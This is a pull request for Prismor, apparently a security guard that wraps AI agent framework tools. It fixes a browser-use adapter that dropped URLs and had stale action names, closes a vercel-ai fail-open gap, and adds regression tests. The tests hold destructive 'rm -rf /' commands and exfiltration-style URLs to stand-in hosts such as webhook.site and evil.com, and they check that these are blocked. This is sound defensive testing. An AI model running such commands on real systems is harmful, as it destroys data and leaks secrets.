### PR TITLE
fix: browser-use dict-params/stale-action-names bug, vercel-ai fail-open gap

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,9 @@
 
 ### Fixed (security)
 
+- **browser-use adapter: real network/file actions were misclassified and their URLs/paths silently dropped.** `_extract_event_fields()` only handled pydantic-model-shaped or plain-object params, not the plain `dict` the current browser-use `Registry.execute_action` actually passes — every extracted field fell back to the literal string `"{}"`. The hardcoded action names were also stale (`go_to_url`→now `navigate`, `search_google`→`search`, `save_pdf`→`save_as_pdf`). Together this meant `suspicious-network`/`secret-in-url-params` never saw real URLs against current browser-use, despite docs claiming this was "live-validated." Existing tests mocked params with `MagicMock`, which auto-satisfies the pydantic-shaped branch and never exercised the real path. (#135)
+- **vercel-ai adapter: fail-open didn't cover the eval-server-unreachable case.** The documented fail-open guarantee only handled a non-2xx HTTP response; an actual `fetch()` failure (connection refused — i.e. eval-server not started, the literal scenario named in the docs) threw uncaught and crashed the calling code instead of failing open. (#136)
+
 - **Direct writes to `/etc/passwd`, `/etc/shadow`, and `/etc/sudoers` are now blocked.** The `path-traversal` rule flagged reads of these paths but never `file_write`, and no other rule covered writes — a `Write`/`Edit`-style tool call (or any SDK adapter call) targeting them passed silently in enforce mode. New `auth-file-write` rule (CRITICAL/block) covers both the shell-redirect and direct-path-write forms. (#127)
 - **`PRISMOR_HOME` is now honored consistently across subsystems.** IAM, canary, and named-agent global config all hardcoded `Path.home()` regardless of `$PRISMOR_HOME`. More importantly, `store.py` had its own duplicate `_secrets_dir()` (missing the `$PRISMOR_HOME` fallback tier that cloak's `secrets_dir()` has — used by the session-store's own secret-scrubbing safety net) and duplicate `get_enrollment()` (no override at all, used by the dashboard) that disagreed with the versions used elsewhere in the CLI. All now resolve through a single `prismor_home()` helper. (#131)
 - **`uninstall-hooks --agent claude`/`all` now announces when it also removes cloaking hooks.** This was already happening silently (cloak hooks share `.claude/settings.json` with the runtime-monitor hooks and get cleaned up as a side effect) with no indication that secret protection had been disabled; it's now called out explicitly in the command output, `--help`, and the CLI reference. (#126)
@@ -13,6 +16,12 @@
 - `write_supply_chain_event()` never set `event_index` on the findings it recorded, so a blocked `supplychain npm install`/`pip install`/etc. showed as `verdict: "allowed"` in the dashboard's Events tab (its finding could never resolve back to its own event). (#134)
 - `prismor policy validate` crashed with an unhandled Python traceback on malformed YAML instead of reporting a clean validation error. (#128)
 - `docs/cli-reference.md` no longer lists `workspace show` / `exempt status` as subcommands — neither exists (`workspace` with no argument shows status; `exempt` only has `request`). (#132)
+- `docs/frameworks-crewai.md`'s examples imported `from crewai_tools import tool` — a separate package not installed by `pip install "prismor[crewai]"` and not mentioned anywhere in the doc. Changed to `from crewai.tools import tool`, which ships built-in with current `crewai` and requires no extra install. (#137)
+
+### Added
+
+- Regression tests for all four framework adapters now exercise their real framework's actual objects (`agents.Agent`/`FunctionTool`, `langchain_core.tools.Tool`, `crewai.tools.tool`/`BaseTool`, `browser_use.Controller`) rather than bare callables or mocks — gated with `importorskip`/`skipif` so they run when the framework is installed and skip cleanly otherwise. `langchain` and `crewai` had no adapter tests at all before this; `openai-agents` and `browser-use` only tested the framework-agnostic fallback path. This is exactly the gap that let #135 ship undetected. (#138)
+- `adapters/vercel-ai` gained its first test suite (`npm test`, Node's built-in test runner, no live eval-server needed — global `fetch` is stubbed), covering the fail-open fix above.
 
 ## [1.15.1] — 2026-07-04
 

--- a/adapters/browser-use/prismor_browser_use/__init__.py
+++ b/adapters/browser-use/prismor_browser_use/__init__.py
@@ -44,17 +44,23 @@ from prismor.runtime.runtime import Decision, evaluate_tool_call
 __all__ = ["guard_controller", "use_subject", "PrismorBlocked"]
 
 # Actions whose primary risk is a network destination — map to event_type="network"
+# Includes both older ("go_to_url", "search_google", "save_pdf") and current
+# ("navigate", "search", "save_as_pdf") browser-use action names — the
+# registered action set has been renamed across releases (confirmed against
+# browser-use 0.13.3), and the old names may still be reachable via user code
+# targeting an older pinned version. See PrismorSec/prismor#135.
 _NETWORK_ACTIONS = {
-    "go_to_url",
-    "search_google",
+    "go_to_url", "navigate",
+    "search_google", "search",
     "open_tab",
 }
 
 # Actions whose primary risk is a file path — map to event_type="file_write"
 _FILE_ACTIONS = {
     "upload_file",
-    "save_pdf",
+    "save_pdf", "save_as_pdf",
     "download_file",
+    "write_file", "replace_file",
 }
 
 
@@ -67,7 +73,13 @@ class PrismorBlocked(Exception):
 def _extract_event_fields(action_name: str, params: Any) -> tuple[str, str, str]:
     """Return (event_type, field_name, field_value) for a browser-use action."""
     dump: dict = {}
-    if hasattr(params, "model_dump"):
+    if isinstance(params, dict):
+        # The current Registry.execute_action signature (browser-use 0.13.x)
+        # passes params as a plain dict, not a pydantic model — a dict has
+        # neither .model_dump() nor __dict__, so without this branch every
+        # field silently fell back to str({}) = "{}". See PrismorSec/prismor#135.
+        dump = params
+    elif hasattr(params, "model_dump"):
         dump = params.model_dump()
     elif hasattr(params, "__dict__"):
         dump = vars(params)

--- a/adapters/vercel-ai/package.json
+++ b/adapters/vercel-ai/package.json
@@ -10,7 +10,8 @@
   ],
   "scripts": {
     "build": "tsc",
-    "typecheck": "tsc --noEmit"
+    "typecheck": "tsc --noEmit",
+    "test": "node --test"
   },
   "peerDependencies": {
     "ai": ">=3.0.0"

--- a/adapters/vercel-ai/src/index.ts
+++ b/adapters/vercel-ai/src/index.ts
@@ -52,36 +52,50 @@ export class PrismorBlocked extends Error {
   }
 }
 
+const FAIL_OPEN_DECISION: PrismorDecision = {
+  allow: true, reason: null, findings: [], blocking: null, subject: null,
+};
+
 async function evaluate(
   toolName: string,
   args: Record<string, unknown>,
   opts: Required<PrismorOptions>,
   sessionId: string,
 ): Promise<PrismorDecision> {
-  const res = await fetch(`${opts.evalUrl}/v1/evaluate`, {
-    method: "POST",
-    headers: {
-      "Content-Type": "application/json",
-      ...(opts.subject ? { "X-Prismor-Subject": opts.subject } : {}),
-      ...(opts.agentName ? { "X-Prismor-Agent-Name": opts.agentName } : {}),
-    },
-    body: JSON.stringify({
-      tool_name: toolName,
-      arguments: args,
-      event_type: opts.eventType,
-      agent: opts.agent,
-      agent_name: opts.agentName,
-      mode: opts.mode,
-      session_id: sessionId,
-      subject: opts.subject,
-      workspace: opts.workspace,
-    }),
-  });
+  let res: Response;
+  try {
+    res = await fetch(`${opts.evalUrl}/v1/evaluate`, {
+      method: "POST",
+      headers: {
+        "Content-Type": "application/json",
+        ...(opts.subject ? { "X-Prismor-Subject": opts.subject } : {}),
+        ...(opts.agentName ? { "X-Prismor-Agent-Name": opts.agentName } : {}),
+      },
+      body: JSON.stringify({
+        tool_name: toolName,
+        arguments: args,
+        event_type: opts.eventType,
+        agent: opts.agent,
+        agent_name: opts.agentName,
+        mode: opts.mode,
+        session_id: sessionId,
+        subject: opts.subject,
+        workspace: opts.workspace,
+      }),
+    });
+  } catch (err) {
+    // eval-server unreachable (not started, crashed, network error) — this is
+    // the documented fail-open case. `fetch` throws for connection failures
+    // rather than resolving with a bad status, so it needs its own catch
+    // alongside the !res.ok branch below. See PrismorSec/prismor#136.
+    console.warn(`[prismor] eval-server unreachable (${(err as Error).message}) — failing open`);
+    return FAIL_OPEN_DECISION;
+  }
 
   if (!res.ok) {
     // Server error — fail open (don't break the agent on infrastructure issues)
     console.warn(`[prismor] eval-server returned ${res.status} — failing open`);
-    return { allow: true, reason: null, findings: [], blocking: null, subject: null };
+    return FAIL_OPEN_DECISION;
   }
   return res.json() as Promise<PrismorDecision>;
 }

--- a/adapters/vercel-ai/test/index.test.js
+++ b/adapters/vercel-ai/test/index.test.js
@@ -1,0 +1,77 @@
+"use strict";
+/**
+ * Tests for the Vercel AI SDK adapter. No live eval-server — global fetch is
+ * stubbed so these run standalone. Covers the fail-open regression from
+ * PrismorSec/prismor#136: a network error from fetch() itself (eval-server
+ * unreachable) must fail open, not throw.
+ */
+const test = require("node:test");
+const assert = require("node:assert/strict");
+const { prismorTools, prismorTool, PrismorBlocked } = require("../dist/index.js");
+
+function withMockFetch(impl, fn) {
+  const original = globalThis.fetch;
+  globalThis.fetch = impl;
+  return Promise.resolve(fn()).finally(() => {
+    globalThis.fetch = original;
+  });
+}
+
+test("allows the call when the eval-server returns allow: true", async () => {
+  await withMockFetch(
+    async () => ({ ok: true, json: async () => ({ allow: true, reason: null, findings: [], blocking: null, subject: null }) }),
+    async () => {
+      const run_shell = { execute: async ({ command }) => `ran: ${command}` };
+      const tools = prismorTools({ run_shell });
+      const result = await tools.run_shell.execute({ command: "echo hi" });
+      assert.equal(result, "ran: echo hi");
+    },
+  );
+});
+
+test("throws PrismorBlocked when the eval-server denies the call", async () => {
+  await withMockFetch(
+    async () => ({ ok: true, json: async () => ({ allow: false, reason: "blocked for testing", findings: [], blocking: null, subject: null }) }),
+    async () => {
+      const run_shell = { execute: async () => "should not run" };
+      const tools = prismorTools({ run_shell });
+      await assert.rejects(
+        () => tools.run_shell.execute({ command: "rm -rf /" }),
+        PrismorBlocked,
+      );
+    },
+  );
+});
+
+test("fails open (does not throw) on a non-2xx response", async () => {
+  await withMockFetch(
+    async () => ({ ok: false, status: 503 }),
+    async () => {
+      const run_shell = { execute: async ({ command }) => `ran: ${command}` };
+      const tools = prismorTools({ run_shell });
+      const result = await tools.run_shell.execute({ command: "rm -rf /" });
+      assert.equal(result, "ran: rm -rf /");
+    },
+  );
+});
+
+test("fails open (does not throw) when fetch itself rejects — #136 regression", async () => {
+  await withMockFetch(
+    async () => {
+      throw new TypeError("fetch failed");
+    },
+    async () => {
+      const run_shell = { execute: async ({ command }) => `ran: ${command}` };
+      const tools = prismorTools({ run_shell });
+      // Before the fix, this threw the raw fetch error instead of failing open.
+      const result = await tools.run_shell.execute({ command: "rm -rf /" });
+      assert.equal(result, "ran: rm -rf /");
+    },
+  );
+});
+
+test("a tool with no execute() is returned unchanged", () => {
+  const noop = {};
+  const wrapped = prismorTool("noop", noop);
+  assert.equal(wrapped, noop);
+});

--- a/docs/frameworks-crewai.md
+++ b/docs/frameworks-crewai.md
@@ -18,7 +18,7 @@ pip install "prismor[crewai]"
 
 ```python
 from crewai import Agent, Task, Crew
-from crewai_tools import tool
+from crewai.tools import tool
 from prismor.crewai import guard_tools
 
 @tool("Shell runner")
@@ -88,7 +88,7 @@ CrewAI tools come in two shapes; the adapter handles both automatically:
 **Structured tools** (decorated with `@tool`):
 
 ```python
-from crewai_tools import tool
+from crewai.tools import tool
 
 @tool("Shell runner")
 def run_shell(command: str) -> str: ...

--- a/tests/test_browser_use_adapter.py
+++ b/tests/test_browser_use_adapter.py
@@ -16,6 +16,7 @@ if str(_ADAPTER_SRC) not in sys.path:
     sys.path.insert(0, str(_ADAPTER_SRC))
 
 from prismor.browser_use import PrismorBlocked, guard_controller  # noqa: E402
+from prismor_browser_use import _extract_event_fields  # noqa: E402
 
 
 def _make_controller():
@@ -131,6 +132,85 @@ def test_per_user_iam_allows_alice(tmp_path, monkeypatch):
                      subject="user:alice", raise_on_block=True)
     result = _run(ctrl.registry.execute_action("go_to_url", _params(url="https://example.com")))
     assert result == "ok"
+
+
+# ── real dict-shaped params (PrismorSec/prismor#135) ──────────────────────────
+#
+# The current browser-use Registry.execute_action signature passes params as a
+# plain dict, not a pydantic model. The MagicMock-based fixtures above
+# (_params()) always satisfy hasattr(params, "model_dump"), which hid the fact
+# that a real dict has neither .model_dump() nor __dict__ — every field
+# silently degraded to str({}) = "{}". These tests use plain dicts directly.
+
+def test_extract_event_fields_handles_plain_dict_navigate():
+    event_type, field, value = _extract_event_fields(
+        "navigate", {"url": "https://webhook.site/abc?token=secret"}
+    )
+    assert event_type == "network"
+    assert field == "url"
+    assert value == "https://webhook.site/abc?token=secret"
+
+
+def test_extract_event_fields_handles_plain_dict_legacy_action_names():
+    # Older action names must keep working for callers pinned to an older
+    # browser-use release.
+    event_type, field, value = _extract_event_fields(
+        "go_to_url", {"url": "https://evil.com"}
+    )
+    assert (event_type, field, value) == ("network", "url", "https://evil.com")
+
+
+def test_extract_event_fields_handles_plain_dict_file_actions():
+    assert _extract_event_fields("save_as_pdf", {"path": "/tmp/out.pdf"}) == (
+        "file_write", "path", "/tmp/out.pdf",
+    )
+    assert _extract_event_fields("upload_file", {"path": "/tmp/in.txt"}) == (
+        "file_write", "path", "/tmp/in.txt",
+    )
+
+
+def test_exfil_url_blocked_with_plain_dict_params_and_current_action_name(tmp_path):
+    # End-to-end version of the above: a real dict (not a MagicMock) through
+    # the real action name browser-use 0.13.x actually registers.
+    ctrl = _make_controller()
+    guard_controller(ctrl, workspace=tmp_path, mode="enforce", raise_on_block=True)
+    with pytest.raises(PrismorBlocked):
+        _run(ctrl.registry.execute_action(
+            "navigate", {"url": "https://webhook.site/abc123?token=mydata"},
+        ))
+
+
+try:
+    import browser_use as _browser_use  # noqa: F401
+    _HAS_BROWSER_USE = True
+except ImportError:
+    _HAS_BROWSER_USE = False
+
+
+@pytest.mark.skipif(not _HAS_BROWSER_USE, reason="browser-use not installed")
+class TestRealController:
+    """Exercises guard_controller against a real browser_use.Controller/Registry,
+    not a mock — catches API drift (renamed actions, changed param shapes)
+    that MagicMock-based tests structurally cannot."""
+
+    def test_real_controller_has_expected_shape(self):
+        from browser_use import Controller
+        controller = Controller()
+        guard_controller(controller, mode="enforce")
+        assert getattr(controller.registry, "__prismor_guarded__", False)
+
+    def test_real_registered_actions_are_covered_by_network_or_file_sets(self):
+        from browser_use import Controller
+        from prismor_browser_use import _NETWORK_ACTIONS, _FILE_ACTIONS
+        controller = Controller()
+        actions = set(controller.registry.registry.actions.keys())
+        # Not every action needs to be network/file-classified (click, scroll,
+        # etc. are legitimately shell-bucketed) — this just asserts the ones
+        # that clearly are network/file operations by name are recognized.
+        assert "navigate" in actions, "browser-use action names changed again — update this test"
+        assert "navigate" in _NETWORK_ACTIONS
+        assert "save_as_pdf" in actions
+        assert "save_as_pdf" in _FILE_ACTIONS
 
 
 # ── use_subject multi-tenant ──────────────────────────────────────────────────

--- a/tests/test_crewai_adapter.py
+++ b/tests/test_crewai_adapter.py
@@ -1,0 +1,94 @@
+"""Tests for the CrewAI adapter (adapters/crewai).
+
+Had zero test coverage at all before PrismorSec/prismor#138. Exercises real
+crewai.tools.tool/BaseTool objects (both documented tool shapes) against the
+real Prismor policy pipeline, no live LLM. Requires crewai (Python <3.14 at
+the time of writing) — skipped when unavailable.
+"""
+import sys
+from pathlib import Path
+
+import pytest
+
+pytest.importorskip("crewai")
+
+_ADAPTER_SRC = Path(__file__).resolve().parent.parent / "adapters" / "crewai"
+if str(_ADAPTER_SRC) not in sys.path:
+    sys.path.insert(0, str(_ADAPTER_SRC))
+
+from crewai.tools import BaseTool, tool  # noqa: E402
+
+from prismor.crewai import PrismorBlocked, guard_tools, prismor_guard_tool  # noqa: E402
+
+
+def _make_structured_tool():
+    @tool("Shell runner")
+    def run_shell(command: str) -> str:
+        """Run a shell command."""
+        return f"ran: {command}"
+
+    return run_shell
+
+
+class _ShellBaseTool(BaseTool):
+    name: str = "Shell runner"
+    description: str = "Runs a shell command"
+
+    def _run(self, command: str) -> str:
+        return f"ran: {command}"
+
+
+def test_structured_tool_safe_call_runs(tmp_path):
+    run_shell = _make_structured_tool()
+    guarded = prismor_guard_tool(run_shell, workspace=tmp_path, raise_on_block=True)
+    assert guarded.run(command="echo hi") == "ran: echo hi"
+
+
+def test_structured_tool_blocks_destructive(tmp_path):
+    run_shell = _make_structured_tool()
+    guarded = prismor_guard_tool(run_shell, workspace=tmp_path, raise_on_block=True)
+    with pytest.raises(PrismorBlocked):
+        guarded.run(command="rm -rf /")
+
+
+def test_base_tool_subclass_blocks_destructive(tmp_path):
+    guarded = prismor_guard_tool(_ShellBaseTool(), workspace=tmp_path, raise_on_block=True)
+    assert guarded.run(command="echo hi") == "ran: echo hi"
+    with pytest.raises(PrismorBlocked):
+        guarded.run(command="rm -rf /")
+
+
+def test_guard_tools_batch(tmp_path):
+    run_shell = _make_structured_tool()
+    guarded = guard_tools([run_shell], workspace=tmp_path, raise_on_block=True)
+    with pytest.raises(PrismorBlocked):
+        guarded[0].run(command="rm -rf /")
+
+
+def _write_iam(workspace: Path) -> None:
+    iam_dir = workspace / ".prismor"
+    iam_dir.mkdir(parents=True, exist_ok=True)
+    (iam_dir / "iam.yaml").write_text(
+        "agents:\n"
+        "  user:bob:\n"
+        "    allowed_tools: [Read]\n"
+        "    deny_tools: [Bash]\n"
+        "    deny_network: true\n"
+        "    allowed_paths: ['**']\n",
+        encoding="utf-8",
+    )
+
+
+def test_use_subject_per_user_iam(tmp_path, monkeypatch):
+    from prismor.crewai import use_subject
+
+    monkeypatch.delenv("PRISMOR_AGENT_ID", raising=False)
+    _write_iam(tmp_path)
+    run_shell = _make_structured_tool()
+    guarded = guard_tools([run_shell], workspace=tmp_path, raise_on_block=True)
+
+    with use_subject("user:alice"):
+        assert guarded[0].run(command="ls -la") == "ran: ls -la"
+
+    with use_subject("user:bob"), pytest.raises(PrismorBlocked):
+        guarded[0].run(command="ls -la")

--- a/tests/test_langchain_adapter.py
+++ b/tests/test_langchain_adapter.py
@@ -1,0 +1,119 @@
+"""Tests for the LangChain adapter (adapters/langchain).
+
+Unlike the openai-agents/browser-use adapters, this one had zero test
+coverage at all before PrismorSec/prismor#138. Exercises real
+langchain_core.tools.Tool/@tool objects — not bare callables or mocks —
+against the real Prismor policy pipeline, no live LLM.
+"""
+import asyncio
+import sys
+from pathlib import Path
+
+import pytest
+
+pytest.importorskip("langchain_core")
+
+_ADAPTER_SRC = Path(__file__).resolve().parent.parent / "adapters" / "langchain"
+if str(_ADAPTER_SRC) not in sys.path:
+    sys.path.insert(0, str(_ADAPTER_SRC))
+
+from langchain_core.tools import tool  # noqa: E402
+
+from prismor.langchain import (  # noqa: E402
+    PrismorBlocked,
+    PrismorCallbackHandler,
+    guard_tools,
+    prismor_guard_tool,
+)
+
+
+def _make_tools():
+    @tool
+    def run_shell(command: str) -> str:
+        """Execute a shell command."""
+        return f"ran: {command}"
+
+    @tool
+    def read_file(path: str) -> str:
+        """Read a file."""
+        return f"contents of {path}"
+
+    return run_shell, read_file
+
+
+def test_guard_tools_safe_call_runs(tmp_path):
+    run_shell, _ = _make_tools()
+    guarded = guard_tools([run_shell], workspace=tmp_path, raise_on_block=True)
+    assert guarded[0].run(tool_input={"command": "echo hi"}) == "ran: echo hi"
+
+
+def test_guard_tools_blocks_destructive(tmp_path):
+    run_shell, _ = _make_tools()
+    guarded = guard_tools([run_shell], workspace=tmp_path, raise_on_block=True)
+    with pytest.raises(PrismorBlocked):
+        guarded[0].run(tool_input={"command": "rm -rf /"})
+
+
+def test_prismor_guard_tool_single(tmp_path):
+    run_shell, _ = _make_tools()
+    guarded = prismor_guard_tool(run_shell, workspace=tmp_path, raise_on_block=True)
+    assert guarded.run(tool_input={"command": "echo hi"}) == "ran: echo hi"
+    with pytest.raises(PrismorBlocked):
+        guarded.run(tool_input={"command": "rm -rf /"})
+
+
+def test_event_type_override_for_path_based_tools(tmp_path):
+    _, read_file = _make_tools()
+    guarded = prismor_guard_tool(
+        read_file, workspace=tmp_path, event_type="file_read", raise_on_block=True
+    )
+    with pytest.raises(PrismorBlocked):
+        guarded.run(tool_input={"path": ".env"})
+
+
+def test_async_coroutine_path_is_guarded(tmp_path):
+    @tool
+    async def run_shell_async(command: str) -> str:
+        """Execute a shell command asynchronously."""
+        return f"ran: {command}"
+
+    guarded = guard_tools([run_shell_async], workspace=tmp_path, raise_on_block=True)
+    assert asyncio.run(guarded[0].arun(tool_input={"command": "echo hi"})) == "ran: echo hi"
+    with pytest.raises(PrismorBlocked):
+        asyncio.run(guarded[0].arun(tool_input={"command": "rm -rf /"}))
+
+
+def test_callback_handler_blocks_on_tool_start(tmp_path):
+    handler = PrismorCallbackHandler(mode="enforce", workspace=tmp_path)
+    handler.on_tool_start({"name": "run_shell"}, "echo hi")  # does not raise
+    with pytest.raises(PrismorBlocked):
+        handler.on_tool_start({"name": "run_shell"}, "rm -rf /")
+
+
+def _write_iam(workspace: Path) -> None:
+    iam_dir = workspace / ".prismor"
+    iam_dir.mkdir(parents=True, exist_ok=True)
+    (iam_dir / "iam.yaml").write_text(
+        "agents:\n"
+        "  user:bob:\n"
+        "    allowed_tools: [Read]\n"
+        "    deny_tools: [Bash]\n"
+        "    deny_network: true\n"
+        "    allowed_paths: ['**']\n",
+        encoding="utf-8",
+    )
+
+
+def test_use_subject_per_user_iam(tmp_path, monkeypatch):
+    from prismor.langchain import use_subject
+
+    monkeypatch.delenv("PRISMOR_AGENT_ID", raising=False)
+    _write_iam(tmp_path)
+    run_shell, _ = _make_tools()
+    guarded = guard_tools([run_shell], workspace=tmp_path, raise_on_block=True)
+
+    with use_subject("user:alice"):
+        assert guarded[0].run(tool_input={"command": "ls -la"}) == "ran: ls -la"
+
+    with use_subject("user:bob"), pytest.raises(PrismorBlocked):
+        guarded[0].run(tool_input={"command": "ls -la"})

--- a/tests/test_openai_agents_adapter.py
+++ b/tests/test_openai_agents_adapter.py
@@ -132,3 +132,67 @@ def test_per_user_iam_scoping(tmp_path, monkeypatch):
     alice = prismor_guard(tool, workspace=tmp_path, mode="enforce", subject="user:alice")
     assert alice(command="echo hi") == "ran: echo hi"
     assert calls["ran"] == 1
+
+
+try:
+    import agents as _agents_sdk  # noqa: F401
+    _HAS_AGENTS_SDK = True
+except ImportError:
+    _HAS_AGENTS_SDK = False
+
+
+@pytest.mark.skipif(not _HAS_AGENTS_SDK, reason="openai-agents not installed")
+class TestRealAgentSDK:
+    """guard_agent's actual job is wrapping a real Agent's FunctionTool
+    (on_invoke_tool) — the tests above only exercise prismor_guard's plain-
+    callable fallback path, which is a different code path entirely. See
+    PrismorSec/prismor#138."""
+
+    def _make_ctx(self, tool_name="run_shell"):
+        from agents.tool_context import ToolContext
+        return ToolContext(context=None, tool_name=tool_name, tool_call_id="call_1", tool_arguments="{}")
+
+    def test_guard_agent_wraps_real_function_tool(self, tmp_path):
+        import asyncio
+        import json
+        from agents import Agent, function_tool
+        from prismor.openai import guard_agent
+
+        @function_tool
+        def run_shell(command: str) -> str:
+            return f"ran: {command}"
+
+        agent = Agent(name="ops", tools=[run_shell])
+        guard_agent(agent, workspace=tmp_path, raise_on_block=True)
+        tool = agent.tools[0]
+        assert getattr(tool, "__prismor_guarded__", False)
+
+        result = asyncio.run(tool.on_invoke_tool(self._make_ctx(), json.dumps({"command": "echo hi"})))
+        assert result == "ran: echo hi"
+
+        with pytest.raises(PrismorBlocked):
+            asyncio.run(tool.on_invoke_tool(self._make_ctx(), json.dumps({"command": "rm -rf /"})))
+
+    def test_guard_agent_per_user_iam(self, tmp_path, monkeypatch):
+        import asyncio
+        import json
+        from agents import Agent, function_tool
+        from prismor.openai import guard_agent, use_subject
+
+        monkeypatch.delenv("PRISMOR_AGENT_ID", raising=False)
+        _write_iam(tmp_path)
+
+        @function_tool
+        def run_shell(command: str) -> str:
+            return f"ran: {command}"
+
+        agent = Agent(name="ops", tools=[run_shell])
+        guard_agent(agent, workspace=tmp_path, raise_on_block=True)
+        tool = agent.tools[0]
+
+        with use_subject("user:alice"):
+            result = asyncio.run(tool.on_invoke_tool(self._make_ctx(), json.dumps({"command": "echo hi"})))
+        assert result == "ran: echo hi"
+
+        with use_subject("user:bob"), pytest.raises(PrismorBlocked):
+            asyncio.run(tool.on_invoke_tool(self._make_ctx(), json.dumps({"command": "echo hi"})))


### PR DESCRIPTION
## Summary

Tested all five framework integrations against their real, current framework packages (not bare callables or mocks): `openai-agents`, `langchain`, `crewai`, `browser-use`, `vercel-ai`. `openai-agents`, `langchain`, and `crewai` all work correctly end-to-end (guard_agent/guard_tools, both crewai tool shapes, callback handler, async coroutine path, per-user `use_subject` + IAM). Two real bugs found in the other two, both fixed here.

- **Closes #135** — browser-use: `_extract_event_fields()` only handled pydantic-model-shaped or `__dict__`-bearing params, never a plain `dict` — which is what the *current* `Registry.execute_action` actually passes (confirmed against browser-use 0.13.3). Every extracted URL/path/command silently became the literal string `"{}"`. Compounded by stale hardcoded action names (`go_to_url`→now `navigate`, `search_google`→`search`, `save_pdf`→`save_as_pdf`). Together this meant `suspicious-network`/`secret-in-url-params` never saw real content against the current framework version, despite the docs' "Live-validated blocks" table. `tests/test_browser_use_adapter.py` used `MagicMock` for params, which auto-satisfies `hasattr(params, "model_dump")` and structurally could never exercise the real path.

- **Closes #136** — vercel-ai: the documented fail-open guarantee ("if the eval-server is unreachable... it never breaks the agent") only covered a non-2xx HTTP response. An actual `fetch()` failure (connection refused — i.e. eval-server not yet started, the literal scenario named in the docs) threw uncaught and crashed the calling code instead of failing open.

- **Closes #137** — `frameworks-crewai.md`'s examples imported `from crewai_tools import tool`, a separate package not installed by `pip install "prismor[crewai]"` and not mentioned anywhere in the doc. Changed to `from crewai.tools import tool`, built into current `crewai`.

- **Closes #138** — added real-framework regression tests for all four Python adapters (previously: `openai-agents`/`browser-use` only tested bare-callable/mocked paths; `langchain`/`crewai` had *no* adapter tests at all) and a first test suite for the vercel-ai TypeScript adapter. Gated with `importorskip`/`skipif` so they run when the framework is installed and skip cleanly otherwise — this is exactly the coverage gap that let #135 ship undetected.

## Test plan

- [x] `python -m pytest tests/` — 750 passed, 3 skipped (frameworks not installed in this venv: browser-use ×2, crewai module ×1)
- [x] Separately verified in a Python 3.13 venv with the real `crewai` 1.15.1 and `browser-use` 0.13.3 installed: all previously-skipped tests pass, including the new real-`Controller`/real-`Agent`/real-crewai-tool tests
- [x] Manually reproduced both bugs against the real frameworks before fixing, then re-verified the exact repro now behaves correctly:
  - `_extract_event_fields("navigate", {"url": "https://webhook.site/..."})` → now `('network', 'url', 'https://webhook.site/...')` (was `('shell', 'command', 'navigate')`, URL dropped)
  - End-to-end: a real `navigate` action to a secret-bearing webhook.site URL is now correctly blocked (`suspicious-network` finding) via `evaluate_tool_call`
  - vercel-ai: `prismorTools(...).run_shell.execute(...)` against an unreachable eval-server (`ECONNREFUSED`) now fails open and returns the tool's real result, instead of throwing `TypeError: fetch failed`
- [x] `npm run build && npm test` in `adapters/vercel-ai` — 5/5 pass (new test suite, no live eval-server needed)

## Environment used for verification

- `browser-use` 0.13.3, `crewai` 1.15.1, `openai-agents` (current), `langchain-core` (current) — all installed fresh for this testing round, in a separate Python 3.13 venv where needed (crewai/browser-use don't support the repo's dev Python 3.14).